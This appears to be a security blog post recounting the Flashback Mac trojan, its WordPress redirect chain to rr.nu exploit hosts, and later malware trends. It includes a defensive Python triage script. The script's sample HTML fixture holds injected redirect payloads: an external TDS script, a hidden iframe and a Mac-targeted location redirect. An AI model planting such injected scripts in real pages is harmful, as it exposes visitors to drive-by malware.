Not so long ago, the Mac was thought to be impervious to viruses. In fact, Apple once stated on its website that “it doesn’t get PC viruses”. That was before the Flashback trojan for Mac OS X became a mass infection in 2012.

Since then, Mac and iPhone security issues have changed dramatically — and so has the security of the entire world. In this post, we’ll revisit how the Flashback incident unfolded and how it changed the security landscape forever.

What is the Mac Flashback Trojan?

Flashback (also called Flashfake) is a Mac OS X trojan first detected in September 2011. By early April 2012, it had infected around 700,000 Macs worldwide. After infection, compromised Macs were recruited into a botnet through which the operators could install additional malicious code. One of the malware’s objectives was to generate fake search engine results.

According to researchers, threat actors used Flashback to siphon Google ad revenue. The trojan’s ad-clicking component loaded into Chrome, Firefox and Safari, where it could intercept browser requests and redirect specific search queries to a page of the attacker’s choosing. From there, criminals raked in click-generated revenue totaling about $10,000 per day.

Infected Through WordPress

According to Kaspersky, Flashback malware spread thanks to a threat partner program that appeared to be of Russian origin.

The program injected redirect scripts into huge numbers of legitimate websites worldwide. By early March 2012, it had compromised tens of thousands of sites powered by WordPress, most likely because site owners were running vulnerable WordPress versions or had installed the ToolsPack plugin. Approximately 85% of the compromised sites were located in the US.

When a visitor loaded any of the infected sites, the injected script contacted a traffic direction system (TDS). The TDS could then send the browser, through a hidden redirect, to sites in the rr.nu domain zone. Those rogue sites hosted the drive-by exploits that installed Flashback on vulnerable Macs without any user interaction.
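The hooks that chain describes (an injected external script, a hidden iframe, a meta refresh or an inline location assignment pointing off-site) are what a responder looks for when triaging a page served by a possibly compromised WordPress install. The following script is an added example, not code from the original article and not Kaspersky’s tooling: it parses saved HTML, reports every redirect hook whose host is not the site’s own, and flags hosts in a watched zone as high severity. The rr.nu zone comes from the article; the sample HTML and every other host in it are constructed for the example.

```python
"""Triage helper for Flashback-style injected redirects (added example).

Given the HTML of a page served by a possibly compromised site, find the hooks a
drive-by redirect chain relies on: external <script src>, external <iframe>,
<meta http-equiv="refresh">, and inline window.location assignments. Hooks whose
host is the site's own are ignored; hosts in a watched zone are flagged "high".
"""
from dataclasses import dataclass
from html.parser import HTMLParser
import re
from urllib.parse import urlparse

@dataclass
class Finding:
    kind: str        # "script", "iframe", "meta-refresh" or "inline-redirect"
    target: str      # URL the hook points to
    severity: str    # "high" if the host is in a watched zone, else "medium"

# Constructed sample: a normal WordPress page plus an injected TDS script,
# a 1x1 external iframe and an inline redirect. Hosts are made up; only the
# rr.nu zone is taken from the article.
SAMPLE_HTML = """<html><head>
<title>Example blog</title>
<script src="/wp-includes/js/jquery.js"></script>
<script src="http://stat-counter.rr.nu/tds.php?id=3"></script>
</head><body>
<p>Welcome.</p>
<iframe src="http://7f1e2.example-ads.net/go" width="1" height="1" style="visibility:hidden"></iframe>
<script>
  if (navigator.userAgent.indexOf("Mac") > -1) {
    window.location = "http://jump.rr.nu/?ref=wp";
  }
</script>
</body></html>"""

WATCHED_ZONES = ("rr.nu",)   # zone named in the article; extend as needed

INLINE_REDIRECT = re.compile(
    r"""(?:window\.location|document\.location|location\.href)\s*=\s*["']([^"']+)["']""")
META_REFRESH_URL = re.compile(r"url\s*=\s*(\S+)", re.IGNORECASE)


def host_of(url: str) -> str:
    """Lowercase host of url, or "" for relative URLs."""
    return (urlparse(url).hostname or "").lower()


def in_zone(host: str, zones=WATCHED_ZONES) -> bool:
    """True if host is a watched zone or a subdomain of one (label-aligned)."""
    return any(host == z or host.endswith("." + z) for z in zones)


class RedirectHookParser(HTMLParser):
    """Collects redirect hooks; site_host is the legitimate site's own host."""
    def __init__(self, site_host: str):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings: list[Finding] = []
        self._in_script = False

    def _report(self, kind: str, url: str) -> None:
        host = host_of(url)
        if not host or host == self.site_host:
            return  # relative or same-origin: not an off-site hook
        self.findings.append(Finding(kind, url, "high" if in_zone(host) else "medium"))

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
            if a.get("src"):
                self._report("script", a["src"])
        elif tag == "iframe" and a.get("src"):
            self._report("iframe", a["src"])
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = META_REFRESH_URL.search(a.get("content") or "")
            if m:
                self._report("meta-refresh", m.group(1).strip("'\""))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:  # inline script body: look for location assignments
            for url in INLINE_REDIRECT.findall(data):
                self._report("inline-redirect", url)


def find_redirect_hooks(html: str, site_host: str) -> list[Finding]:
    """Return all off-site redirect hooks found in html, in document order."""
    p = RedirectHookParser(site_host)
    p.feed(html)
    return p.findings


if __name__ == "__main__":
    for f in find_redirect_hooks(SAMPLE_HTML, "blog.example.org"):
        print(f"[{f.severity}] {f.kind}: {f.target}")
```

Run against the sample, it reports the rr.nu script and inline redirect as high and the external iframe as medium, while the site’s own jQuery include is ignored. The zone check is label-aligned so that `rr.nu.example.com` does not match; obfuscated redirects (`eval`, string concatenation) are outside what this static pass catches, which is why a triage like this is a first filter, not a verdict.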

A New Reality for iOS and macOS

News of Flashback shook the entire cybersecurity and tech industry. The Mac OS, once considered a haven against viruses, had fallen. And it was not an isolated event. Soon after, in April 2012, a new Mac OS X trojan was discovered.

Fast forward to the present day, and the vulnerabilities continue to multiply. In August 2022, the Apple Support site published security updates for iOS 15.6.1, iPadOS 15.6.1 and macOS Monterey 12.5.1. Apple’s advisory described flaws that could let maliciously crafted web content, or an application, execute arbitrary code with kernel privileges, and noted reports that they may have been actively exploited. In practice that means an intruder could take full control of the device, impersonate its owner and run any software in their name.

While these weaknesses make headlines, the reality is that no system is immune to security threats. You only need to browse the Apple and Microsoft security updates pages to see the extent of the issues discovered. Alongside these concerns, threat actors have only increased their efforts to find and exploit every vulnerability.

Malware Development is on the Rise

Macs and iPhones are still comparatively safe: their built-in security remains above par. But no OS is entirely secure anymore, if any ever was.

Consider these chilling facts. According to Atlas VPN, macOS malware development surged by over 1,000% in 2020, with a total of 674,273 new malware samples. Compare that to Windows, which faced over 91 million samples in 2020. These are counts of distinct malicious files seen by vendors, not of infected machines, but the trend is clear.

In some ways, the Flashback incident marked a moment in history when attack rates began to increase significantly. For example, from 2012 to 2013, the number of recorded malware infections more than doubled, from 82.62 million to 165.81 million incidents. Monetary damage from cyber crime reported to the IC3 also increased by over $200 million between 2012 and 2013. From there, incident rates and costs have ramped up quickly and show no signs of slowing.

Currently, many factors contribute to this rise. For starters, more people working from home greatly widens the attack surface. The conflict in Ukraine, cheap attack services and a tight security labor market also contribute. All these factors dramatically increase the pressure on security teams.

The IBM Cost of a Data Breach 2022 report revealed that 83% of organizations studied have had more than one data breach. These new realities make security not only a top business concern but also a core element of overall business strategy.

New Threats Require New Tools

If the Flashback trojan was a bellwether event, it might have ushered in a new way of thinking about security. If no system is entirely secure, then mitigating tools must be more adaptive and intelligent. Rather than hoping to install a failsafe system, approaches such as threat intelligence, zero trust and AI-driven security are remodeling how we think about security.

Applications and devices are proliferating exponentially. Remote work is on the rise. Companies continue to migrate their networks to the cloud. By definition, we live and work in a perimeter-less reality, and our security solutions must evolve to serve us there.

The stakes couldn’t be higher. We’ve seen critical infrastructure like the Colonial Pipeline attacked. Government agencies and agriculture are under increasing pressure as well. Even top-tier security firms have been hacked. And the conflict between Russia and Ukraine has raised the stakes even higher than anyone imagined.

Sitting still and hoping that luck or flimsy security solutions will suffice is no longer an option. We need entirely new ways to protect people, IT assets, governments, businesses and entire societies.

Adapting to Security Challenges

Despite the rising number of threats, security professionals are stepping up to the challenge with measurable results. For instance, the IBM report revealed that:

  • Companies with fully deployed security AI and automation saved an average of $3.05 million per breach
  • An incident response (IR) team and a regularly tested IR plan were associated with average savings of $2.66 million
  • Organizations with extended detection and response (XDR) technologies shortened the breach lifecycle by 29 days

Perhaps nobody will ever again be able to say, “it doesn’t get PC viruses”. But we will continue to develop new ways to thwart threats to our security. Innovation and hard work pay off. And they can help secure our future.
